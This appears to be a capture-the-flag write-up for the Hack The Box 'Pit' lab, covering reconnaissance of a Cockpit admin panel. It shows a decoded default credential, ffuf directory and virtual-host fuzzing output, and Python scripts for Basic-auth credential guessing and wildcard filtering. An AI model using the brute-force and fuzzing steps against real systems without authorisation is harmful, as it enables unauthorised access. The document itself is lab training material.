Web


Nmap discovered a web server on the target port. While Nmap was unable to identify the service, the fingerprint output reveals some suggestive information.

Webroot


It appears to be a login page to a web-based administrative panel.

I captured the responses from the web server using Burp Suite. The result shows that it’s Cockpit.

Cockpit is a server administration tool sponsored by Red Hat, focused on providing a modern-looking and user-friendly interface to manage and administer servers. Fedora 21 included Cockpit by default, and since then it has continued to grow and mature. Red Hat Enterprise Linux 7 shipped Cockpit in the optional and extras repositories, and it is included in Red Hat Enterprise Linux 8 by default. Cockpit is not the first of its class (many old-time system administrators may remember Webmin), but the alternatives are usually clunky and bloated, and their underlying APIs may be a security risk. That is where Cockpit is different and shines: with Cockpit, unnecessary services or APIs don’t get in the way of doing things.

Version Information


The version information can be checked through /api/system/cockpit-version, but the web server redirects me to a login page. Either the version information is being actively hidden, or it is protected behind authentication.

Basic HTTP Authentication


While I was testing some weak/default credentials, I found something interesting.

Usually a web application uses a POST request for signing in, but Cockpit, in this case, uses a GET request to /cockpit/login carrying the credentials in an HTTP Basic Authorization header. The header value is just base64 of user:password, so it decodes trivially:

┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ echo YWRtaW46cGFzc3dvcmQ= | base64 -d
admin:password

So this suggests that I may be able to brute-force my way in, although it is not very practical in a real-world application.
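The login exchange described above, as an added example (not code from the original write-up or from the Cockpit project): it builds and decodes the Basic header, then runs a small credential loop against a pluggable sender. The embedded mock responder and the candidate list are constructed for offline demonstration, and the host/port default to the write-up's target (dms-pit.htb:9090); swap in http_send to talk to a real Cockpit instance.

```python
"""Probe a Cockpit login: GET /cockpit/login with an HTTP Basic Authorization header.

Added example, not from the original write-up. Cockpit answers a rejected Basic
credential with 401 and an accepted one with 200, so the status code alone
separates a hit from a miss.
"""
import base64
import http.client
import ssl
from typing import Callable, Iterable, Optional, Tuple

LOGIN_PATH = "/cockpit/login"
TARGET_HOST, TARGET_PORT = "dms-pit.htb", 9090   # from the write-up's target


def basic_auth_header(user: str, password: str) -> str:
    """Encode user:password as an RFC 7617 Basic credential."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic_header(header: str) -> Tuple[str, str]:
    """Reverse of basic_auth_header; the same thing `echo ... | base64 -d` does."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def http_send(header: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
              verify_tls: bool = False) -> int:
    """Real sender: one GET /cockpit/login over HTTPS, returning the status code."""
    ctx = ssl.create_default_context()
    if not verify_tls:                      # lab hosts usually have self-signed certs
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=10)
    conn.request("GET", LOGIN_PATH, headers={"Authorization": header})
    status = conn.getresponse().status
    conn.close()
    return status


def try_credentials(candidates: Iterable[Tuple[str, str]],
                    send: Callable[[str], int]) -> Optional[Tuple[str, str]]:
    """Return the first (user, password) pair that yields HTTP 200, else None.

    401 is a clean miss; anything else (429, 5xx, redirects) is a transport or
    rate-limit problem and is raised rather than silently counted as a miss.
    """
    for user, password in candidates:
        status = send(basic_auth_header(user, password))
        if status == 200:
            return user, password
        if status != 401:
            raise RuntimeError(f"unexpected status {status} while trying {user}")
    return None


# Constructed stand-in for the target: accepts only the pair decoded above.
_VALID = basic_auth_header("admin", "password")


def mock_send(header: str) -> int:
    return 200 if header == _VALID else 401


# Constructed candidate list for the offline run.
CANDIDATES = [("admin", "admin"), ("root", "toor"), ("admin", "password")]

if __name__ == "__main__":
    print(decode_basic_header("Basic YWRtaW46cGFzc3dvcmQ="))
    print(try_credentials(CANDIDATES, mock_send))
```

Every attempt against a real host is a full PAM authentication performed by cockpit-ws on the target, so each failure is logged there and can trip faillock-style lockout; keep candidate lists short and deliberate rather than spraying a wordlist.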

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://dms-pit.htb:9090/FUZZ -ic -e .php,.txt,.html -fs 43548 
________________________________________________
 
 :: Method           : GET
 :: URL              : https://dms-pit.htb:9090/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 43548
________________________________________________
Research                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 602ms]
ping                    [Status: 200, Size: 24, Words: 4, Lines: 1, Duration: 95ms]
news_archive            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 469ms]
momentum                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 577ms]
about_logo              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 587ms]
Nav                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 680ms]
Environmental           [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
stirmark                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2417ms]
blk_bl                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
7983                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2907ms]
83379                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 610ms]
9857                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
picture-messages        [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2638ms]
visitor_map             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 921ms]
lumines-ii              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3456ms]
gnue                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 541ms]
73026                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 594ms]
Livsstil                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 362ms]
seasonsum_navcurve      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
article32               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1348ms]
qlogic                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 93ms]
topio                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 94ms]
link-2                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 93ms]
ban_home                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 92ms]
ingenierie              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 92ms]
emulex                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 94ms]
:: Progress: [882188/882188] :: Job [1/1] :: 423 req/sec :: Duration: [0:53:28] :: Errors: 0 ::

Everything except ping is a false positive: those responses are empty (Size: 0, Words: 1, Lines: 1), which means the server answers any unknown path with a 200 and an empty body. Adding 0 to the size filter (-fs 43548,0) or filtering on one word (-fw 1) would have suppressed them.

/ping


Navigating to /ping returns a small JSON document. Nothing special here.

Sub-domain / Virtual Host Discovery


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://$IP:9090/ -H 'Host: FUZZ.dms-pit.htb' -fs 43548
________________________________________________
 
 :: Method           : GET
 :: URL              : https://10.10.10.241:9090/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.dms-pit.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 43548
________________________________________________
web3371                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
web18783                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 845ms]
web3522                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 846ms]
tix                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 579ms]
auta                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 581ms]
delivery.o              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
mobiclub                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
dalia                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
gi455                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
gi454                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
www.theotherside        [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 130ms]
gi453                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 126ms]
images.b                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 129ms]
gi451                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
gi452                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2105ms]
waisu-xsrvjp            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
marukyo-net-cojp        [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
gates-xsrvjp            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
sol-tec-cojp            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
tkt-center-info         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
fairyparadise-com       [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
xinfo738-xsrvjp         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
k2k2-jp                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 116ms]
kimono-united-com       [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 110ms]
hmhits-com              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
sorahime-com            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
db08                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
soooooooooon-xsrvjp     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 116ms]
:: Progress: [114441/114441] :: Job [1/1] :: 189 req/sec :: Duration: [0:22:29] :: Errors: 4 ::

All the results returned by ffuf are false positives, as each response is empty (Size: 0, Words: 1, Lines: 1), the same wildcard response seen in the directory fuzzing run.
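Triage for both ffuf runs above (the directory fuzzing and the virtual-host discovery), as an added example that is not part of the original write-up: it parses ffuf's console output, infers the wildcard response signature as the most common (status, size, words, lines) tuple, which is the same idea ffuf's own autocalibration uses, and keeps only entries that deviate from it. The sample lines are constructed from the two runs shown above.

```python
"""Separate real ffuf hits from a server's catch-all response.

Added example, not from the original write-up. A size filter on the login page
(-fs 43548) does not remove a wildcard route that answers 200 with an empty
body, so the results fill up with Size: 0, Words: 1 entries. Finding the modal
signature and dropping it leaves the genuine hit (/ping).
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

Signature = Tuple[int, int, int, int]          # (status, size, words, lines)

# One ffuf result line; banner and progress lines do not match.
_LINE = re.compile(
    r"^(?P<word>\S+)\s+\[Status:\s*(?P<status>\d+),\s*Size:\s*(?P<size>\d+),"
    r"\s*Words:\s*(?P<words>\d+),\s*Lines:\s*(?P<lines>\d+)"
)

# Constructed from the directory and vhost runs above.
SAMPLE_OUTPUT = """\
Research                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 602ms]
ping                    [Status: 200, Size: 24, Words: 4, Lines: 1, Duration: 95ms]
news_archive            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 469ms]
web3371                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
:: Progress: [882188/882188] :: Job [1/1] :: 423 req/sec :: Duration: [0:53:28] :: Errors: 0 ::
"""


def parse_ffuf(text: str) -> List[Dict[str, object]]:
    """Parse ffuf's default console output into dicts with int fields."""
    results = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        results.append({"word": d["word"],
                        **{k: int(d[k]) for k in ("status", "size", "words", "lines")}})
    return results


def signature(r: Dict[str, object]) -> Signature:
    return (r["status"], r["size"], r["words"], r["lines"])


def wildcard_signature(results: List[Dict[str, object]]) -> Optional[Signature]:
    """Most frequent signature, or None when no signature repeats.

    A server that answers every unknown path the same way produces one
    signature many times; a single occurrence is not evidence of a wildcard.
    """
    if not results:
        return None
    sig, count = Counter(signature(r) for r in results).most_common(1)[0]
    return sig if count >= 2 else None


def real_hits(results: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Drop every result matching the wildcard signature."""
    wild = wildcard_signature(results)
    return [r for r in results if signature(r) != wild]


def extra_filter_flags(wild: Signature) -> str:
    """ffuf flags that would have suppressed the wildcard responses up front."""
    _, size, words, _ = wild
    return f"-fs {size} -fw {words}"


if __name__ == "__main__":
    parsed = parse_ffuf(SAMPLE_OUTPUT)
    wild = wildcard_signature(parsed)
    print("wildcard signature:", wild, "->", extra_filter_flags(wild))
    for hit in real_hits(parsed):
        print("real hit:", hit["word"], hit["size"], "bytes")
```

Feeding the full output of either run through parse_ffuf and real_hits leaves only ping from the directory run and nothing from the vhost run, which matches the manual assessment above.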